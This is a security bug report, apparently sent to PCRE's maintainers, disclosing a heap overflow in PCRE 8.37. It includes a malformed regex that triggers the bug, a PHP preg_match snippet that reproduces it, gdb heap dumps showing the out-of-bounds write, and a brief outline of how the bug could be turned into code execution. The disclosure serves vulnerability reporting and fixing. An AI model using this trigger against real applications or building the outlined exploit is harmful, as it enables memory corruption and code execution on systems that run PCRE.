https://bugs.exim.org/show_bug.cgi?id=1667
Bug ID: 1667 Summary: PCRE Library Heap Overflow Vulnerability Product: PCRE Version: 8.37 Hardware: All OS: All Status: NEW Severity: security Priority: medium Component: Code Assignee: p...@hermes.cam.ac.uk Reporter: rubym...@yeah.net CC: pcre-dev@exim.org I. Summary PCRE is a regular expression C library inspired by the regular expression capabilities in the Perl programming language. The PCRE library is incorporated into a number of prominent programs, such as Adobe Flash, Apache, Nginx, PHP. PCRE library is prone to a vulnerability which leads to Heap Overflow. During the compilation of a malformed regular expression, more data is written on the malloced block than the expected size output by compile_regex. Exploits with advanced Heap Fengshui techniques may allow an attacker to execute arbitrary code in the context of the user running the affected application. ------------------------------------------------------------------ II. Description Latest version of PCRE is prone to a Heap Overflow vulnerability which could caused by the following regular expression. /(?J:(?|(:(?|(?'R')(\k'R')|((?'R')))H'Rk'Rf)|s(?'R'))))/ To reproduce the problem, we could use pcretest provide by PCRE library or applications which is wrapped with PCRE such as PHP. For pcretest, simply type the regular expression after the re> For PHP, latest version of PHP 5.6.11 (wrapped with PCRE 8.37) could be triggered by following code snippet: <?php preg_match("/(?J:(?|(:(?|(?'R')(\k'R')|((?'R')))H'Rk'Rf)|s(?'R'))))/","ADLAB",$arr); ?> First, pcre_compile2 invoke compile_regex() to calcuate the size of memory that is used to save the regular expression. re then points to the new allocated memory with the size above. Next, pcre_compile2 invoke compile_regex() again to fill the regular expression into the allocated memory. The problem here is that more data is written then expected. Following test is conveyed under Ubuntu 14.10 x64 with php 5.6.11: ============================================================== gdb php poc.php 9292 re = (REAL_PCRE *)(PUBL(malloc))(size); (gdb) print size $2=184 (gdb) n 9293 if (re == NULL) (gdb) x/x $rax 0x1f87050: 0x78 (gdb) c 9368 *code = OP_BRA; 9369 (void)compile_regex(re->options, &code, &ptr, &errorcode, FALSE, FALSE, 0, 0, 9370 &firstchar, &firstcharflags, &reqchar, &reqcharflags, NULL, cd, NULL); ============================================================== So the expected size of the above regular expression is 184. And the base address of allocated memory is 0x1f87050. Here is the layout of 0x1f87050 just before the second compile_regexp: ============================================================== (gdb) x/192b 0x1f87050 0x1f87050: [0x45 0x52 0x43 0x50 0xb8 0x00 0x00 0x00 0x1f87058: 0x00 0x00 0x00 0x00 0x00 0x04 0x00 0x00 0x1f87060: 0xff 0xff 0xff 0xff 0xff 0xff 0xff 0xff 0x1f87068: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f87070: 0xff 0xff 0x40 0x00 0x04 0x00 0x03 0x00 0x1f87078: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f87080: 0x30 0x77 0xf8 0x01 0x00 0x00 0x00 0x00 0x1f87088: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f87090: 0x00 0x02 0x52 0x00 0x00 0x03 0x52 0x00 0x1f87098: 0x00 0x01 0x52 0x00 0x00 0x00 0x00 0x00 0x1f870a0: 0xff 0xff 0xff 0xff 0x00 0x00 0x00 0x00 0x1f870a8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f870b0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f870b8: 0xa0 0x76 0x34 0xf7 0xff 0x7f 0x00 0x00 0x1f870c0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f870c8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f870d0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f870d8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f870e0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f870e8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f870f0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f870f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f87100: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00] 0x1f87108: 0x11 0x01 0x00 0x00 0x00 0x00 0x00 0x00 ============================================================== After the second compile_regexp: ============================================================== (gdb) x/192b 0x1f87050 0x1f87050: [0x45 0x52 0x43 0x50 0xb8 0x00 0x00 0x00 0x1f87058: 0x00 0x00 0x00 0x00 0x00 0x04 0x00 0x00 0x1f87060: 0xff 0xff 0xff 0xff 0xff 0xff 0xff 0xff 0x1f87068: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f87070: 0xff 0xff 0x40 0x00 0x04 0x00 0x03 0x00 0x1f87078: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f87080: 0x30 0x77 0xf8 0x01 0x00 0x00 0x00 0x00 0x1f87088: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x1f87090: 0x00 0x02 0x52 0x00 0x00 0x03 0x52 0x00 0x1f87098: 0x00 0x01 0x52 0x00 0x83 0x00 0x6e 0x83 0x1f870a0: 0x00 0x68 0x83 0x00 0x55 0x81 0x00 0x4f 0x1f870a8: 0x85 0x00 0x49 0x00 0x01 0x1d 0x3a 0x83 0x1f870b0: 0x00 0x1e 0x85 0x00 0x05 0x00 0x02 0x78 0x1f870b8: 0x00 0x05 0x81 0x00 0x10 0x85 0x00 0x0a 0x1f870c0: 0x00 0x03 0x73 0x00 0x00 0x00 0x03 0x78 0x1f870c8: 0x00 0x0a 0x78 0x00 0x10 0x77 0x00 0x13 0x1f870d0: 0x85 0x00 0x0d 0x00 0x02 0x85 0x00 0x05 0x1f870d8: 0x00 0x03 0x78 0x00 0x05 0x78 0x00 0x0d 0x1f870e0: 0x78 0x00 0x31 0x1d 0x48 0x1d 0x27 0x1d 0x1f870e8: 0x52 0x1d 0x6b 0x1d 0x27 0x1d 0x52 0x1d 0x1f870f0: 0x66 0x78 0x00 0x49 0x78 0x00 0x4f 0x77 0x1f870f8: 0x00 0x0d 0x1d 0x73 0x85 0x00 0x05 0x00 0x1f87100: 0x01 0x78 0x00 0x05 0x78 0x00 0x62 0x78] 0x1f87108: *0x00 *0x68 *0x78 *0x00 *0x6e 0x00 0x00 0x00 ============================================================== Obviously, at least 5 more bytes are written on the heap in this case. This overflow can be used to modify adjacent length field of array/vector/string, gaining the attacker the ability to read/write the whole memory in the context of the affected application (The same trick as CVE-2013-0634). ------------------------------------------------------------------ III. Impact Heap Overflow ------------------------------------------------------------------ IV. Affected latest version of PCRE is confirmed to be vulnerable). Other applications may also be affected. ------------------------------------------------------------------ V. Credit Wen Guanxing from Venustech ADLAB is credited for this vulnerability. -- You are receiving this mail because: You are on the CC list for the bug. -- ## List details at https://lists.exim.org/mailman/listinfo/pcre-dev